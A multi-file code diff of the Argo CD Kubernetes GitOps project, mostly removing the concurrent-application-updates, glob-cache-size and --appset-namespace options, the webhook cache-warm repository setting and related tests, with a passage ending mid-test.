// to add equality for argov1alpha1.ApplicationDestination
@@ -71,15 +34,10 @@ func BuildIgnoreDiffConfig(ignoreDifferences argov1alpha1.ApplicationSetIgnoreDi
// cluster. The object's desired state must be reconciled with the existing
// state inside the passed in callback MutateFn.
//
// diffConfig must be built once per reconcile cycle via BuildIgnoreDiffConfig and may be nil
// when there are no ignoreDifferences rules. obj.Spec must already be normalized by the caller
// via NormalizeApplicationSpec before this function is called; the live object fetched from the
// cluster is normalized internally.
//
// The MutateFn is called regardless of creating or updating an object.
//
// It returns the executed operation and an error.
func CreateOrUpdate(ctx context.Context, logCtx *log.Entry, c client.Client, diffConfig argodiff.DiffConfig, obj *argov1alpha1.Application, f controllerutil.MutateFn) (controllerutil.OperationResult, error) {
func CreateOrUpdate(ctx context.Context, logCtx *log.Entry, c client.Client, ignoreAppDifferences argov1alpha1.ApplicationSetIgnoreDifferences, ignoreNormalizerOpts normalizers.IgnoreNormalizerOpts, obj *argov1alpha1.Application, f controllerutil.MutateFn) (controllerutil.OperationResult, error) {
key := client.ObjectKeyFromObject(obj)
if err := c.Get(ctx, key, obj); err != nil {
if !errors.IsNotFound(err) {
@@ -101,18 +59,43 @@ func CreateOrUpdate(ctx context.Context, logCtx *log.Entry, c client.Client, dif
return controllerutil.OperationResultNone, err
}
// Normalize the live spec to avoid spurious diffs from unimportant differences (e.g. nil vs
// empty SyncPolicy). obj.Spec is already normalized by the caller; only the live side needs it.
normalizedLive.Spec = *argo.NormalizeApplicationSpec(&normalizedLive.Spec)
// Apply ignoreApplicationDifferences rules to remove ignored fields from both the live and the desired state. This
// prevents those differences from appearing in the diff and therefore in the patch.
err := applyIgnoreDifferences(diffConfig, normalizedLive, obj)
err := applyIgnoreDifferences(ignoreAppDifferences, normalizedLive, obj, ignoreNormalizerOpts)
if err != nil {
return controllerutil.OperationResultNone, fmt.Errorf("failed to apply ignore differences: %w", err)
}
if appEquality.DeepEqual(normalizedLive, obj) {
// Normalize to avoid diffing on unimportant differences.
normalizedLive.Spec = *argo.NormalizeApplicationSpec(&normalizedLive.Spec)
obj.Spec = *argo.NormalizeApplicationSpec(&obj.Spec)
equality := conversion.EqualitiesOrDie(
func(a, b resource.Quantity) bool {
// Ignore formatting, only care that numeric value stayed the same.
// TODO: if we decide it's important, it should be safe to start comparing the format.
//
// Uninitialized quantities are equivalent to 0 quantities.
return a.Cmp(b) == 0
},
func(a, b metav1.MicroTime) bool {
return a.UTC().Equal(b.UTC())
},
func(a, b metav1.Time) bool {
return a.UTC().Equal(b.UTC())
},
func(a, b labels.Selector) bool {
return a.String() == b.String()
},
func(a, b fields.Selector) bool {
return a.String() == b.String()
},
func(a, b argov1alpha1.ApplicationDestination) bool {
return a.Namespace == b.Namespace && a.Name == b.Name && a.Server == b.Server
},
)
if equality.DeepEqual(normalizedLive, obj) {
return controllerutil.OperationResultNone, nil
}
@@ -152,13 +135,19 @@ func mutate(f controllerutil.MutateFn, key client.ObjectKey, obj client.Object)
}
// applyIgnoreDifferences applies the ignore differences rules to the found application. It modifies the applications in place.
// diffConfig may be nil, in which case this is a no-op.
func applyIgnoreDifferences(diffConfig argodiff.DiffConfig, found *argov1alpha1.Application, generatedApp *argov1alpha1.Application) error {
if diffConfig == nil {
func applyIgnoreDifferences(applicationSetIgnoreDifferences argov1alpha1.ApplicationSetIgnoreDifferences, found *argov1alpha1.Application, generatedApp *argov1alpha1.Application, ignoreNormalizerOpts normalizers.IgnoreNormalizerOpts) error {
if len(applicationSetIgnoreDifferences) == 0 {
return nil
}
generatedAppCopy := generatedApp.DeepCopy()
diffConfig, err := argodiff.NewDiffConfigBuilder().
WithDiffSettings(applicationSetIgnoreDifferences.ToApplicationIgnoreDifferences(), nil, false, ignoreNormalizerOpts).
WithNoCache().
Build()
if err != nil {
return fmt.Errorf("failed to build diff config: %w", err)
}
unstructuredFound, err := appToUnstructured(found)
if err != nil {
return fmt.Errorf("failed to convert found application to unstructured: %w", err)

View File

@@ -5,7 +5,7 @@ import (
"github.com/stretchr/testify/assert"
"github.com/stretchr/testify/require"
"go.yaml.in/yaml/v3"
"gopkg.in/yaml.v3"
metav1 "k8s.io/apimachinery/pkg/apis/meta/v1"
"github.com/argoproj/argo-cd/v3/pkg/apis/application/v1alpha1"
@@ -224,9 +224,7 @@ spec:
generatedApp := v1alpha1.Application{TypeMeta: appMeta}
err = yaml.Unmarshal([]byte(tc.generatedApp), &generatedApp)
require.NoError(t, err, tc.generatedApp)
diffConfig, err := BuildIgnoreDiffConfig(tc.ignoreDifferences, normalizers.IgnoreNormalizerOpts{})
require.NoError(t, err)
err = applyIgnoreDifferences(diffConfig, &foundApp, &generatedApp)
err = applyIgnoreDifferences(tc.ignoreDifferences, &foundApp, &generatedApp, normalizers.IgnoreNormalizerOpts{})
require.NoError(t, err)
yamlFound, err := yaml.Marshal(tc.foundApp)
require.NoError(t, err)

4
assets/swagger.json generated
View File

@@ -9727,10 +9727,6 @@
"username": {
"type": "string",
"title": "Username contains the user name used for authenticating at the remote repository"
},
"webhookManifestCacheWarmDisabled": {
"description": "WebhookManifestCacheWarmDisabled disables manifest cache warming during webhook processing for this repository.\nWhen set, webhook handlers will only trigger reconciliation for affected applications and skip Redis cache\noperations for unaffected ones. Recommended for large monorepos with plain YAML manifests.",
"type": "boolean"
}
}
},

View File

@@ -79,7 +79,6 @@ func NewCommand() *cobra.Command {
tokenRefStrictMode bool
maxResourcesStatusCount int
cacheSyncPeriod time.Duration
concurrentApplicationUpdates int
)
scheme := runtime.NewScheme()
_ = clientgoscheme.AddToScheme(scheme)
@@ -240,25 +239,24 @@ func NewCommand() *cobra.Command {
})
if err = (&controllers.ApplicationSetReconciler{
Generators: topLevelGenerators,
Client: utils.NewCacheSyncingClient(mgr.GetClient(), mgr.GetCache()),
Scheme: mgr.GetScheme(),
Recorder: mgr.GetEventRecorderFor("applicationset-controller"),
Renderer: &utils.Render{},
Policy: policyObj,
EnablePolicyOverride: enablePolicyOverride,
KubeClientset: k8sClient,
ArgoDB: argoCDDB,
ArgoCDNamespace: namespace,
ApplicationSetNamespaces: applicationSetNamespaces,
EnableProgressiveSyncs: enableProgressiveSyncs,
SCMRootCAPath: scmRootCAPath,
GlobalPreservedAnnotations: globalPreservedAnnotations,
GlobalPreservedLabels: globalPreservedLabels,
Metrics: &metrics,
MaxResourcesStatusCount: maxResourcesStatusCount,
ClusterInformer: clusterInformer,
ConcurrentApplicationUpdates: concurrentApplicationUpdates,
Generators: topLevelGenerators,
Client: utils.NewCacheSyncingClient(mgr.GetClient(), mgr.GetCache()),
Scheme: mgr.GetScheme(),
Recorder: mgr.GetEventRecorderFor("applicationset-controller"),
Renderer: &utils.Render{},
Policy: policyObj,
EnablePolicyOverride: enablePolicyOverride,
KubeClientset: k8sClient,
ArgoDB: argoCDDB,
ArgoCDNamespace: namespace,
ApplicationSetNamespaces: applicationSetNamespaces,
EnableProgressiveSyncs: enableProgressiveSyncs,
SCMRootCAPath: scmRootCAPath,
GlobalPreservedAnnotations: globalPreservedAnnotations,
GlobalPreservedLabels: globalPreservedLabels,
Metrics: &metrics,
MaxResourcesStatusCount: maxResourcesStatusCount,
ClusterInformer: clusterInformer,
}).SetupWithManager(mgr, enableProgressiveSyncs, maxConcurrentReconciliations); err != nil {
log.Error(err, "unable to create controller", "controller", "ApplicationSet")
os.Exit(1)
@@ -305,7 +303,6 @@ func NewCommand() *cobra.Command {
command.Flags().BoolVar(&enableGitHubAPIMetrics, "enable-github-api-metrics", env.ParseBoolFromEnv("ARGOCD_APPLICATIONSET_CONTROLLER_ENABLE_GITHUB_API_METRICS", false), "Enable GitHub API metrics for generators that use the GitHub API")
command.Flags().IntVar(&maxResourcesStatusCount, "max-resources-status-count", env.ParseNumFromEnv("ARGOCD_APPLICATIONSET_CONTROLLER_MAX_RESOURCES_STATUS_COUNT", 5000, 0, math.MaxInt), "Max number of resources stored in appset status.")
command.Flags().DurationVar(&cacheSyncPeriod, "cache-sync-period", env.ParseDurationFromEnv("ARGOCD_APPLICATIONSET_CONTROLLER_CACHE_SYNC_PERIOD", time.Hour*10, 0, time.Hour*24), "Period at which the manager client cache is forcefully resynced with the Kubernetes API server. 0 disables periodic resync.")
command.Flags().IntVar(&concurrentApplicationUpdates, "concurrent-application-updates", env.ParseNumFromEnv("ARGOCD_APPLICATIONSET_CONTROLLER_CONCURRENT_APPLICATION_UPDATES", 1, 1, 200), "Number of concurrent Application create/update/delete operations per ApplicationSet reconcile.")
return &command
}

View File

@@ -1,28 +0,0 @@
package command
import (
"testing"
"github.com/stretchr/testify/assert"
"github.com/stretchr/testify/require"
)
func TestNewCommand_ConcurrentApplicationUpdatesFlag(t *testing.T) {
cmd := NewCommand()
flag := cmd.Flags().Lookup("concurrent-application-updates")
require.NotNil(t, flag, "expected --concurrent-application-updates flag to be registered")
assert.Equal(t, "int", flag.Value.Type())
assert.Equal(t, "1", flag.DefValue, "default should be 1")
}
func TestNewCommand_ConcurrentApplicationUpdatesFlagValue(t *testing.T) {
cmd := NewCommand()
err := cmd.Flags().Set("concurrent-application-updates", "5")
require.NoError(t, err)
val, err := cmd.Flags().GetInt("concurrent-application-updates")
require.NoError(t, err)
assert.Equal(t, 5, val)
}

View File

@@ -34,7 +34,6 @@ import (
"github.com/argoproj/argo-cd/v3/util/dex"
"github.com/argoproj/argo-cd/v3/util/env"
"github.com/argoproj/argo-cd/v3/util/errors"
utilglob "github.com/argoproj/argo-cd/v3/util/glob"
"github.com/argoproj/argo-cd/v3/util/kube"
"github.com/argoproj/argo-cd/v3/util/templates"
"github.com/argoproj/argo-cd/v3/util/tls"
@@ -88,7 +87,6 @@ func NewCommand() *cobra.Command {
applicationNamespaces []string
enableProxyExtension bool
webhookParallelism int
globCacheSize int
hydratorEnabled bool
syncWithReplaceAllowed bool
@@ -124,7 +122,6 @@ func NewCommand() *cobra.Command {
cli.SetLogFormat(cmdutil.LogFormat)
cli.SetLogLevel(cmdutil.LogLevel)
cli.SetGLogLevel(glogLevel)
utilglob.SetCacheSize(globCacheSize)
// Recover from panic and log the error using the configured logger instead of the default.
defer func() {
@@ -329,7 +326,6 @@ func NewCommand() *cobra.Command {
command.Flags().StringSliceVar(&applicationNamespaces, "application-namespaces", env.StringsFromEnv("ARGOCD_APPLICATION_NAMESPACES", []string{}, ","), "List of additional namespaces where application resources can be managed in")
command.Flags().BoolVar(&enableProxyExtension, "enable-proxy-extension", env.ParseBoolFromEnv("ARGOCD_SERVER_ENABLE_PROXY_EXTENSION", false), "Enable Proxy Extension feature")
command.Flags().IntVar(&webhookParallelism, "webhook-parallelism-limit", env.ParseNumFromEnv("ARGOCD_SERVER_WEBHOOK_PARALLELISM_LIMIT", 50, 1, 1000), "Number of webhook requests processed concurrently")
command.Flags().IntVar(&globCacheSize, "glob-cache-size", env.ParseNumFromEnv("ARGOCD_SERVER_GLOB_CACHE_SIZE", utilglob.DefaultGlobCacheSize, 1, math.MaxInt32), "Maximum number of compiled glob patterns to cache for RBAC evaluation")
command.Flags().StringSliceVar(&enableK8sEvent, "enable-k8s-event", env.StringsFromEnv("ARGOCD_ENABLE_K8S_EVENT", argo.DefaultEnableEventList(), ","), "Enable ArgoCD to use k8s event. For disabling all events, set the value as `none`. (e.g --enable-k8s-event=none), For enabling specific events, set the value as `event reason`. (e.g --enable-k8s-event=StatusRefreshed,ResourceCreated)")
command.Flags().BoolVar(&hydratorEnabled, "hydrator-enabled", env.ParseBoolFromEnv("ARGOCD_HYDRATOR_ENABLED", false), "Feature flag to enable Hydrator. Default (\"false\")")
command.Flags().BoolVar(&syncWithReplaceAllowed, "sync-with-replace-allowed", env.ParseBoolFromEnv("ARGOCD_SYNC_WITH_REPLACE_ALLOWED", true), "Whether to allow users to select replace for syncs from UI/CLI")

View File

@@ -149,7 +149,6 @@ func NewGenRepoSpecCommand() *cobra.Command {
repoOpts.Repo.EnableOCI = repoOpts.EnableOci
repoOpts.Repo.UseAzureWorkloadIdentity = repoOpts.UseAzureWorkloadIdentity
repoOpts.Repo.InsecureOCIForceHttp = repoOpts.InsecureOCIForceHTTP
repoOpts.Repo.WebhookManifestCacheWarmDisabled = repoOpts.WebhookManifestCacheWarmDisabled
if repoOpts.Repo.Type == "helm" && repoOpts.Repo.Name == "" {
errors.CheckError(stderrors.New("must specify --name for repos of type 'helm'"))

View File

@@ -2334,7 +2334,7 @@ func NewApplicationSyncCommand(clientOpts *argocdclient.ClientOptions) *cobra.Co
if app.Spec.HasMultipleSources() {
if revision != "" {
log.Fatal("argocd cli does not work on multi-source app with --revision flag. Use --revisions and --source-positions instead.")
log.Fatal("argocd cli does not work on multi-source app with --revision flag. Use --revisions and --source-position instead.")
return
}

View File

@@ -8,7 +8,7 @@ import (
"strings"
"text/tabwriter"
"go.yaml.in/yaml/v3"
"gopkg.in/yaml.v3"
"github.com/argoproj/argo-cd/v3/util/templates"

View File

@@ -40,10 +40,6 @@ var appSetExample = templates.Examples(`
# Delete an ApplicationSet
argocd appset delete APPSETNAME (APPSETNAME...)
# Namespace precedence for --appset-namespace (-N):
# - get/delete: if the argument is namespace/name, that namespace wins; -N is ignored.
# - create/generate: metadata.namespace in the YAML wins when set; -N applies only when the manifest omits namespace.
`)
// NewAppSetCommand returns a new instance of an `argocd appset` command
@@ -68,9 +64,8 @@ func NewAppSetCommand(clientOpts *argocdclient.ClientOptions) *cobra.Command {
// NewApplicationSetGetCommand returns a new instance of an `argocd appset get` command
func NewApplicationSetGetCommand(clientOpts *argocdclient.ClientOptions) *cobra.Command {
var (
output string
showParams bool
appSetNamespace string
output string
showParams bool
)
command := &cobra.Command{
Use: "get APPSETNAME",
@@ -78,13 +73,6 @@ func NewApplicationSetGetCommand(clientOpts *argocdclient.ClientOptions) *cobra.
Example: templates.Examples(`
# Get ApplicationSets
argocd appset get APPSETNAME
# Get ApplicationSet in a specific namespace using qualified name (namespace/name)
argocd appset get APPSET_NAMESPACE/APPSETNAME
# Get ApplicationSet in a specific namespace using --appset-namespace flag
argocd appset get --appset-namespace=APPSET_NAMESPACE APPSETNAME
`),
Run: func(c *cobra.Command, args []string) {
ctx := c.Context()
@@ -97,7 +85,7 @@ func NewApplicationSetGetCommand(clientOpts *argocdclient.ClientOptions) *cobra.
conn, appIf := acdClient.NewApplicationSetClientOrDie()
defer utilio.Close(conn)
appSetName, appSetNs := argo.ParseFromQualifiedName(args[0], appSetNamespace)
appSetName, appSetNs := argo.ParseFromQualifiedName(args[0], "")
appSet, err := appIf.Get(ctx, &applicationset.ApplicationSetGetQuery{Name: appSetName, AppsetNamespace: appSetNs})
errors.CheckError(err)
@@ -125,7 +113,6 @@ func NewApplicationSetGetCommand(clientOpts *argocdclient.ClientOptions) *cobra.
}
command.Flags().StringVarP(&output, "output", "o", "wide", "Output format. One of: json|yaml|wide")
command.Flags().BoolVar(&showParams, "show-params", false, "Show ApplicationSet parameters and overrides")
command.Flags().StringVarP(&appSetNamespace, "appset-namespace", "N", "", "Only get ApplicationSet from a namespace (ignored when qualified name is provided)")
return command
}
@@ -134,7 +121,6 @@ func NewApplicationSetCreateCommand(clientOpts *argocdclient.ClientOptions) *cob
var (
output string
upsert, dryRun, wait bool
appSetNamespace string
)
command := &cobra.Command{
Use: "create",
@@ -143,9 +129,6 @@ func NewApplicationSetCreateCommand(clientOpts *argocdclient.ClientOptions) *cob
# Create ApplicationSets
argocd appset create <filename or URL> (<filename or URL>...)
# Create ApplicationSet in a specific namespace using
argocd appset create --appset-namespace=APPSET_NAMESPACE <filename or URL> (<filename or URL>...)
# Dry-run AppSet creation to see what applications would be managed
argocd appset create --dry-run <filename or URL> -o json | jq -r '.status.resources[].name'
`),
@@ -174,11 +157,6 @@ func NewApplicationSetCreateCommand(clientOpts *argocdclient.ClientOptions) *cob
conn, appIf := argocdClient.NewApplicationSetClientOrDie()
defer utilio.Close(conn)
if appset.Namespace == "" && appSetNamespace != "" {
fmt.Printf("ApplicationSet YAML file does not have namespace; using --appset-namespace=%q.\n", appSetNamespace)
appset.Namespace = appSetNamespace
}
// Get app before creating to see if it is being updated or no change
existing, err := appIf.Get(ctx, &applicationset.ApplicationSetGetQuery{Name: appset.Name, AppsetNamespace: appset.Namespace})
if grpc.UnwrapGRPCStatus(err).Code() != codes.NotFound {
@@ -240,23 +218,18 @@ func NewApplicationSetCreateCommand(clientOpts *argocdclient.ClientOptions) *cob
command.Flags().BoolVar(&dryRun, "dry-run", false, "Allows to evaluate the ApplicationSet template on the server to get a preview of the applications that would be created")
command.Flags().BoolVar(&wait, "wait", false, "Wait until the ApplicationSet's resources are up to date. Will block indefinitely if the ApplicationSet has errors")
command.Flags().StringVarP(&output, "output", "o", "wide", "Output format. One of: json|yaml|wide")
command.Flags().StringVarP(&appSetNamespace, "appset-namespace", "N", "", "Namespace where the ApplicationSet will be created in (ignored when provided YAML file has namespace set in metadata)")
return command
}
// NewApplicationSetGenerateCommand returns a new instance of an `argocd appset generate` command
func NewApplicationSetGenerateCommand(clientOpts *argocdclient.ClientOptions) *cobra.Command {
var output string
var appSetNamespace string
command := &cobra.Command{
Use: "generate",
Short: "Generate apps of ApplicationSet rendered templates",
Example: templates.Examples(`
# Generate apps of ApplicationSet rendered templates
argocd appset generate <filename or URL> (<filename or URL>...)
# Generate apps of ApplicationSet rendered templates in a specific namespace
argocd appset generate --appset-namespace=APPSET_NAMESPACE <filename or URL> (<filename or URL>...)
`),
Run: func(c *cobra.Command, args []string) {
ctx := c.Context()
@@ -279,11 +252,6 @@ func NewApplicationSetGenerateCommand(clientOpts *argocdclient.ClientOptions) *c
errors.Fatal(errors.ErrorGeneric, fmt.Sprintf("Error generating apps for ApplicationSet %s. ApplicationSet does not have Name field set", appset))
}
if appset.Namespace == "" && appSetNamespace != "" {
fmt.Printf("ApplicationSet YAML file does not have namespace; using --appset-namespace=%q.\n", appSetNamespace)
appset.Namespace = appSetNamespace
}
conn, appIf := argocdClient.NewApplicationSetClientOrDie()
defer utilio.Close(conn)
@@ -318,7 +286,6 @@ func NewApplicationSetGenerateCommand(clientOpts *argocdclient.ClientOptions) *c
},
}
command.Flags().StringVarP(&output, "output", "o", "wide", "Output format. One of: json|yaml|wide")
command.Flags().StringVarP(&appSetNamespace, "appset-namespace", "N", "", "Namespace used for generating Applications (ignored when provided YAML file has namespace set in metadata)")
return command
}
@@ -371,9 +338,8 @@ func NewApplicationSetListCommand(clientOpts *argocdclient.ClientOptions) *cobra
// NewApplicationSetDeleteCommand returns a new instance of an `argocd appset delete` command
func NewApplicationSetDeleteCommand(clientOpts *argocdclient.ClientOptions) *cobra.Command {
var (
noPrompt bool
wait bool
appSetNamespace string
noPrompt bool
wait bool
)
command := &cobra.Command{
Use: "delete",
@@ -381,12 +347,6 @@ func NewApplicationSetDeleteCommand(clientOpts *argocdclient.ClientOptions) *cob
Example: templates.Examples(`
# Delete an applicationset
argocd appset delete APPSETNAME (APPSETNAME...)
# Delete ApplicationSet in a specific namespace using qualified name (namespace/name)
argocd appset delete APPSET_NAMESPACE/APPSETNAME
# Delete ApplicationSet in a specific namespace using --appset-namespace flag
argocd appset delete --appset-namespace=APPSET_NAMESPACE APPSETNAME
`),
Run: func(c *cobra.Command, args []string) {
ctx := c.Context()
@@ -415,7 +375,7 @@ func NewApplicationSetDeleteCommand(clientOpts *argocdclient.ClientOptions) *cob
promptUtil := utils.NewPrompt(isTerminal && !noPrompt)
for _, appSetQualifiedName := range args {
appSetName, appSetNs := argo.ParseFromQualifiedName(appSetQualifiedName, appSetNamespace)
appSetName, appSetNs := argo.ParseFromQualifiedName(appSetQualifiedName, "")
appsetDeleteReq := applicationset.ApplicationSetDeleteRequest{
Name: appSetName,
@@ -452,7 +412,6 @@ func NewApplicationSetDeleteCommand(clientOpts *argocdclient.ClientOptions) *cob
}
command.Flags().BoolVarP(&noPrompt, "yes", "y", false, "Turn off prompting to confirm cascaded deletion of Application resources")
command.Flags().BoolVar(&wait, "wait", false, "Wait until deletion of the applicationset(s) completes")
command.Flags().StringVarP(&appSetNamespace, "appset-namespace", "N", "", "Namespace where the ApplicationSet will be deleted from (ignored when qualified name is provided)")
return command
}

View File

@@ -192,7 +192,6 @@ func NewRepoAddCommand(clientOpts *argocdclient.ClientOptions) *cobra.Command {
repoOpts.Repo.ForceHttpBasicAuth = repoOpts.ForceHttpBasicAuth
repoOpts.Repo.UseAzureWorkloadIdentity = repoOpts.UseAzureWorkloadIdentity
repoOpts.Repo.Depth = repoOpts.Depth
repoOpts.Repo.WebhookManifestCacheWarmDisabled = repoOpts.WebhookManifestCacheWarmDisabled
if repoOpts.Repo.Type == "helm" && repoOpts.Repo.Name == "" {
errors.Fatal(errors.ErrorGeneric, "Must specify --name for repos of type 'helm'")

View File

@@ -8,27 +8,26 @@ import (
)
type RepoOptions struct {
Repo appsv1.Repository
Upsert bool
SshPrivateKeyPath string //nolint:revive //FIXME(var-naming)
InsecureOCIForceHTTP bool
InsecureIgnoreHostKey bool
InsecureSkipServerVerification bool
TlsClientCertPath string //nolint:revive //FIXME(var-naming)
TlsClientCertKeyPath string //nolint:revive //FIXME(var-naming)
EnableLfs bool
EnableOci bool
GithubAppId int64
GithubAppInstallationId int64
GithubAppPrivateKeyPath string
GitHubAppEnterpriseBaseURL string
Proxy string
NoProxy string
GCPServiceAccountKeyPath string
ForceHttpBasicAuth bool //nolint:revive //FIXME(var-naming)
UseAzureWorkloadIdentity bool
Depth int64
WebhookManifestCacheWarmDisabled bool
Repo appsv1.Repository
Upsert bool
SshPrivateKeyPath string //nolint:revive //FIXME(var-naming)
InsecureOCIForceHTTP bool
InsecureIgnoreHostKey bool
InsecureSkipServerVerification bool
TlsClientCertPath string //nolint:revive //FIXME(var-naming)
TlsClientCertKeyPath string //nolint:revive //FIXME(var-naming)
EnableLfs bool
EnableOci bool
GithubAppId int64
GithubAppInstallationId int64
GithubAppPrivateKeyPath string
GitHubAppEnterpriseBaseURL string
Proxy string
NoProxy string
GCPServiceAccountKeyPath string
ForceHttpBasicAuth bool //nolint:revive //FIXME(var-naming)
UseAzureWorkloadIdentity bool
Depth int64
}
func AddRepoFlags(command *cobra.Command, opts *RepoOptions) {
@@ -56,5 +55,4 @@ func AddRepoFlags(command *cobra.Command, opts *RepoOptions) {
command.Flags().BoolVar(&opts.UseAzureWorkloadIdentity, "use-azure-workload-identity", false, "whether to use azure workload identity for authentication")
command.Flags().BoolVar(&opts.InsecureOCIForceHTTP, "insecure-oci-force-http", false, "Use http when accessing an OCI repository")
command.Flags().Int64Var(&opts.Depth, "depth", 0, "Specify a custom depth for git clone operations. Unless specified, a full clone is performed using the depth of 0")
command.Flags().BoolVar(&opts.WebhookManifestCacheWarmDisabled, "webhook-manifest-cache-warm-disabled", false, "disable manifest cache warming during webhook processing for this repository (recommended for large monorepos with plain YAML manifests)")
}

View File

@@ -10,7 +10,7 @@ import (
"github.com/Masterminds/sprig/v3"
log "github.com/sirupsen/logrus"
"go.yaml.in/yaml/v3"
"gopkg.in/yaml.v3"
"k8s.io/apimachinery/pkg/apis/meta/v1/unstructured"
"github.com/argoproj/argo-cd/v3/commitserver/apiclient"
@@ -102,6 +102,9 @@ func WriteForPaths(root *os.Root, repoUrl, drySha string, dryCommitMetadata *app
}
}
// if no manifest changes then skip commit
if !atleastOneManifestChanged {
return false, nil
}
return atleastOneManifestChanged, nil
}
@@ -137,13 +140,11 @@ func writeReadme(root *os.Root, dirPath string, metadata hydrator.HydratorCommit
if err != nil && !os.IsExist(err) {
return fmt.Errorf("failed to create README file: %w", err)
}
defer func() {
err := readmeFile.Close()
if err != nil {
log.WithError(err).Error("failed to close README file")
}
}()
err = readmeTemplate.Execute(readmeFile, metadata)
closeErr := readmeFile.Close()
if closeErr != nil {
log.WithError(closeErr).Error("failed to close README file")
}
if err != nil {
return fmt.Errorf("failed to execute readme template: %w", err)
}

View File

@@ -1796,7 +1796,7 @@ func (ctrl *ApplicationController) processAppRefreshQueueItem() (processNext boo
}
}
patchDuration = ctrl.persistReconciliationStatus(origApp, &app.Status)
patchDuration = ctrl.persistAppStatus(origApp, &app.Status)
return processNext
}
logCtx.Warnf("Failed to get cached managed resources for tree reconciliation, fall back to full reconciliation")
@@ -1810,7 +1810,7 @@ func (ctrl *ApplicationController) processAppRefreshQueueItem() (processNext boo
if hasErrors {
app.Status.Sync.Status = appv1.SyncStatusCodeUnknown
app.Status.Health.Status = health.HealthStatusUnknown
patchDuration = ctrl.persistReconciliationStatus(origApp, &app.Status)
patchDuration = ctrl.persistAppStatus(origApp, &app.Status)
if err := ctrl.cache.SetAppResourcesTree(app.InstanceName(ctrl.namespace), &appv1.ApplicationTree{}); err != nil {
logCtx.WithError(err).Warn("failed to set app resource tree")
@@ -1951,7 +1951,7 @@ func (ctrl *ApplicationController) processAppRefreshQueueItem() (processNext boo
}
}
ts.AddCheckpoint("process_finalizers_ms")
patchDuration = ctrl.persistReconciliationStatus(origApp, &app.Status)
patchDuration = ctrl.persistAppStatus(origApp, &app.Status)
// This is a partly a duplicate of patch_ms, but more descriptive and allows to have measurement for the next step.
ts.AddCheckpoint("persist_app_status_ms")
return processNext
@@ -2148,17 +2148,8 @@ func createMergePatch(orig, newV any) ([]byte, bool, error) {
return patch, string(patch) != "{}", nil
}
// persistReconciliationStatus persists updates to application status and consumes the refresh annotation.
func (ctrl *ApplicationController) persistReconciliationStatus(orig *appv1.Application, newStatus *appv1.ApplicationStatus) time.Duration {
newAnnotations := make(map[string]string)
maps.Copy(newAnnotations, orig.GetAnnotations())
delete(newAnnotations, appv1.AnnotationKeyRefresh)
return ctrl.persistAppStatus(orig, newStatus, newAnnotations)
}
// persistAppStatus persists updates to application status and optionally updates annotations.
// If no changes were made, it is a no-op
func (ctrl *ApplicationController) persistAppStatus(orig *appv1.Application, newStatus *appv1.ApplicationStatus, newAnnotations map[string]string) (patchDuration time.Duration) {
// persistAppStatus persists updates to application status. If no changes were made, it is a no-op
func (ctrl *ApplicationController) persistAppStatus(orig *appv1.Application, newStatus *appv1.ApplicationStatus) (patchDuration time.Duration) {
logCtx := log.WithFields(applog.GetAppLogFields(orig))
if orig.Status.Sync.Status != newStatus.Sync.Status {
message := fmt.Sprintf("Updated sync status: %s -> %s", orig.Status.Sync.Status, newStatus.Sync.Status)
@@ -2176,6 +2167,13 @@ func (ctrl *ApplicationController) persistAppStatus(orig *appv1.Application, new
// make sure the last transition time is the same and populated if the health is the same
newStatus.Health.LastTransitionTime = orig.Status.Health.LastTransitionTime
}
var newAnnotations map[string]string
if orig.GetAnnotations() != nil {
newAnnotations = make(map[string]string)
maps.Copy(newAnnotations, orig.GetAnnotations())
delete(newAnnotations, appv1.AnnotationKeyRefresh)
delete(newAnnotations, appv1.AnnotationKeyHydrate)
}
patch, modified, err := createMergePatch(
&appv1.Application{ObjectMeta: metav1.ObjectMeta{Annotations: orig.GetAnnotations()}, Status: orig.Status},
&appv1.Application{ObjectMeta: metav1.ObjectMeta{Annotations: newAnnotations}, Status: *newStatus})
@@ -2763,7 +2761,7 @@ func (ctrl *ApplicationController) applyImpersonationConfig(config *rest.Config,
if !impersonationEnabled {
return nil
}
user, err := settings_util.DeriveServiceAccountToImpersonate(proj, app, destCluster)
user, err := deriveServiceAccountToImpersonate(proj, app, destCluster)
if err != nil {
return fmt.Errorf("error deriving service account to impersonate: %w", err)
}

View File

@@ -5,7 +5,6 @@ import (
"encoding/json"
"errors"
"fmt"
"maps"
"strconv"
"testing"
"time"
@@ -664,7 +663,8 @@ func TestAutoSync(t *testing.T) {
func TestAutoSyncEnabledSetToTrue(t *testing.T) {
app := newFakeApp()
app.Spec.SyncPolicy.Automated = &v1alpha1.SyncPolicyAutomated{Enabled: new(true)}
enable := true
app.Spec.SyncPolicy.Automated = &v1alpha1.SyncPolicyAutomated{Enabled: &enable}
ctrl := newFakeController(t.Context(), &fakeData{apps: []runtime.Object{app}}, nil)
syncStatus := v1alpha1.SyncStatus{
Status: v1alpha1.SyncStatusCodeOutOfSync,
@@ -790,7 +790,8 @@ func TestSkipAutoSync(t *testing.T) {
// Verify we skip when auto-sync is disabled
t.Run("AutoSyncEnableFieldIsSetFalse", func(t *testing.T) {
app := newFakeApp()
app.Spec.SyncPolicy.Automated = &v1alpha1.SyncPolicyAutomated{Enabled: new(false)}
enable := false
app.Spec.SyncPolicy.Automated = &v1alpha1.SyncPolicyAutomated{Enabled: &enable}
ctrl := newFakeController(t.Context(), &fakeData{apps: []runtime.Object{app}}, nil)
syncStatus := v1alpha1.SyncStatus{
Status: v1alpha1.SyncStatusCodeOutOfSync,
@@ -3605,82 +3606,3 @@ func TestSelfHealRemainingBackoff(t *testing.T) {
})
}
}
func TestPersistAppStatus_AnnotationManagement(t *testing.T) {
t.Run("persistReconciliationStatus deletes only refresh annotation", func(t *testing.T) {
app := newFakeApp()
app.Annotations = map[string]string{
v1alpha1.AnnotationKeyRefresh: string(v1alpha1.RefreshTypeNormal),
v1alpha1.AnnotationKeyHydrate: string(v1alpha1.HydrateTypeNormal),
"other-annotation": "other-value",
}
app.Status.Sync.Status = v1alpha1.SyncStatusCodeSynced
app.Status.Health.Status = health.HealthStatusHealthy
ctrl := newFakeController(t.Context(), &fakeData{apps: []runtime.Object{app}}, nil)
origApp := app.DeepCopy()
newStatus := app.Status.DeepCopy()
ctrl.persistReconciliationStatus(origApp, newStatus)
// Verify the patch was created correctly
patchedApp, err := ctrl.applicationClientset.ArgoprojV1alpha1().Applications(app.Namespace).Get(context.Background(), app.Name, metav1.GetOptions{})
require.NoError(t, err)
// Refresh annotation should be deleted
_, hasRefresh := patchedApp.Annotations[v1alpha1.AnnotationKeyRefresh]
assert.False(t, hasRefresh, "refresh annotation should be deleted")
// Hydrate annotation should still exist
